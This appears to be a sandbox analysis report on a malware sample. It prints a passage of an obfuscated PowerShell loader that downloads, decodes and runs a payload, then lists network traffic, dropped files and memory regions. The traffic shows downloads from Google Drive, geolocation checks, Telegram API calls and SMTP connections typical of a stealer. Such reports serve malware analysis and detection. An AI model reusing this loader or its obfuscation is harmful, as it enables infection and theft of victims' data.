KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 0.130.122.193.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 mail.jacopopacchioni.com udp
IT 89.40.173.128:587 mail.jacopopacchioni.com tcp
US 8.8.8.8:53 128.173.40.89.in-addr.arpa udp
IT 89.40.173.128:587 mail.jacopopacchioni.com tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/3032-4-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

memory/3032-10-0x00000216EE460000-0x00000216EE482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygkeupge.013.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3032-15-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-16-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-19-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

memory/3032-20-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-21-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-24-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/1620-25-0x0000000002700000-0x0000000002736000-memory.dmp

memory/1620-26-0x00000000052D0000-0x00000000058F8000-memory.dmp

memory/1620-27-0x0000000005140000-0x0000000005162000-memory.dmp

memory/1620-28-0x00000000051E0000-0x0000000005246000-memory.dmp

memory/1620-29-0x0000000005900000-0x0000000005966000-memory.dmp

memory/1620-39-0x00000000059E0000-0x0000000005D34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2247453c28acd1eb75cfe181540458a8
SHA1 851fc5a9950d422d76163fdc6a453d6859d56660
SHA256 358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA512 42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

memory/1620-41-0x0000000006020000-0x000000000603E000-memory.dmp

memory/1620-42-0x0000000006050000-0x000000000609C000-memory.dmp

memory/1620-43-0x0000000007820000-0x0000000007E9A000-memory.dmp

memory/1620-44-0x00000000065A0000-0x00000000065BA000-memory.dmp

memory/1620-45-0x0000000007280000-0x0000000007316000-memory.dmp

memory/1620-46-0x0000000007220000-0x0000000007242000-memory.dmp

memory/1620-47-0x0000000008450000-0x00000000089F4000-memory.dmp

C:\Users\Admin\AppData\Roaming\precompelling.Wit

MD5 121104fabf2ff99a0b51a39ef26be7a0
SHA1 2bfe2c2ecb97fc48c7d0819cbbceccdb65e0acd7
SHA256 ca1195af4e1d3e7014c66dc288f54119cae1d3e69e10c8617ab69d7b9f2fab85
SHA512 c95db7463111bd67979c92f70ac94bc5441983c32cbbf959807edb6c2f9a94ee7bc3154e179b419d486e173428589e22123d78bc949a5e2f63077f54cf4b3b8e

memory/1620-49-0x0000000008A00000-0x000000000B256000-memory.dmp

memory/1936-62-0x0000000001040000-0x0000000002294000-memory.dmp

memory/1936-63-0x0000000001040000-0x000000000108A000-memory.dmp

memory/1936-64-0x0000000022C00000-0x0000000022C9C000-memory.dmp

memory/1936-66-0x00000000236C0000-0x0000000023882000-memory.dmp

memory/1936-67-0x0000000022FB0000-0x0000000023000000-memory.dmp

memory/1936-68-0x0000000023DC0000-0x00000000242EC000-memory.dmp

memory/1936-71-0x0000000023930000-0x00000000239C2000-memory.dmp

memory/1936-72-0x0000000020770000-0x000000002077A000-memory.dmp